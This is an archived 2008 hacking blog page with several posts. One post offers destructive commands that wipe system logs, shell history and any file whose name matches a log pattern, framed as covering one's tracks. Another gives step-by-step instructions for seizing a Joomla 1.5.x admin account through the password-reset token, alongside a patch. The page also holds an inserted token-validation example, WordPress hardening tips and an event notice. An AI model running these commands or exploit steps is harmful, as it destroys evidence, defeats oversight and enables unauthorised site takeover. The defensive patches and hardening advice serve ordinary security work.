Archive for the 'hacking' Category

Housekeeping

August 16th, 2008

rm -rf /var/log
rm -rf /var/adm
rm -rf /var/apache/log
rm -rf $HISTFILE
find / -name .bash_history -exec rm -rf {} \;
find / -name .bash_logout -exec rm -rf {} \;
find / -name log* -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;

P/S: Use this to delete your logs at your own risk.

Posted by Mr Am | Filed in Hacker, Network Security, hacking, linux | 2 Comments »

 

Joomla 1.5.x Remote Admin Password Change

August 14th, 2008

####################################################
#### Joomla 1.5.x Remote Admin Password Change ####
####################################################

Bug : http://www.milw0rm.com/exploits/6234
Patch : click here
POC :

1. Go to url : www.target.com/index.php?option=com_user&view=reset&layout=confirm
2. Write into field “token” char ‘ and Click OK.
3. Write new password for admin
4. Go to url : www.target.com/administrator/
5. Login admin with new password

Upgrade to latest Joomla! version (1.5.6 or newer)

Or

Add the following code after global $mainframe; on line 113 of reset.php

[sourcecode language='php']
// Reject any reset token that is not exactly 32 characters long.
if (strlen($token) != 32) {
    $this->setError(JText::_('INVALID_TOKEN'));
    return false;
}
[/sourcecode]
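
A stricter form of the same check, as an added example (not Joomla's code and not from the original post): it validates the token's shape before anything else and refuses to match when no reset is pending. The function names are hypothetical, and the hex-only format and the comparison against a stored token are assumptions; the page itself only states the 32-character length.

```php
<?php
// Added example, not Joomla code. Function names are hypothetical.
// Assumption: a reset token is 32 lowercase hex characters (the page only
// states the length 32).

/** Return true only for a well-formed token; rejects '', arrays, wrong length. */
function reset_token_is_well_formed($token): bool
{
    return is_string($token)
        && strlen($token) === 32
        && preg_match('/\A[0-9a-f]{32}\z/', $token) === 1;
}

/**
 * Compare a submitted token with the one stored for the account.
 * $stored is the value saved when the reset was requested (assumption);
 * an account with no pending reset has an empty value, which must never match.
 */
function reset_token_matches($submitted, $stored): bool
{
    if (!reset_token_is_well_formed($submitted)) {
        return false;   // malformed input: fail closed
    }
    if (!reset_token_is_well_formed($stored)) {
        return false;   // no pending reset for this account
    }
    return hash_equals($stored, $submitted);   // constant-time comparison
}

// Constructed sample values for illustration.
$stored = '0123456789abcdef0123456789abcdef';
$cases = [
    'correct token'         => [$stored, $stored],
    'empty token'           => ['', $stored],
    'single quote'          => ["'", $stored],
    'empty vs. no pending'  => ['', ''],
    'array parameter'       => [['x'], $stored],
    'right length, not hex' => [str_repeat('z', 32), $stored],
];
foreach ($cases as $label => [$submitted, $pending]) {
    $verdict = reset_token_matches($submitted, $pending) ? 'accept' : 'reject';
    printf("%-22s %s\n", $label, $verdict);
}
```

Only the first case is accepted; every other input is rejected before the comparison is reached.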

Posted by Mr Am | Filed in Bug, Hacker, Network Security, hacking | 2 Comments »

 

XSS scanner by d3hydr8

July 19th, 2008

Posted by Mr Am | Filed in Hacker, IT, Network Security, Programming, hacking | Comment now »

 

How to secure your wordpress blog

July 15th, 2008

  1. Use the latest stable version of WordPress. Don't use a beta version!
  2. Your database table prefix must be something other than the default prefix (wp_) - securing against SQL injection.
  3. The WordPress version must be hidden - many hackers take advantage of this to attack WordPress versions that are vulnerable. So let them know nothing.
  4. There must be no user "admin" - this would be guessed during SQL injection. If you use it, change it now.
  5. Put an .htaccess file in your /wp-admin/ directory - avoid directory listing.

Posted by Mr Am | Filed in Hacker, Network Security, Wordpress, hacking | 2 Comments »

 

International Hacking Competition 2008 (i-Hack’08)

June 25th, 2008

Event

Basically, 10 programs will be held at this event. They are:

1. Hacking Competition - Capture The Flag (CTF)
2. Hacking Competition - Computer Forensic Challenges
3. Hacking Competition - Defense Challenges
4. Hacking Competition - Malware Analysis Challenge
5. Student Computer Security Project Presentation
6. Computer Security Exhibition
7. Computer Security Forum
8. Computer Security Awareness Talk
9. Hack And Defense Workshop
10. Career Fair

click here for more information

Posted by Mr Am | Filed in Announcement, Hacker, SERVER, System, hacking | Comment now »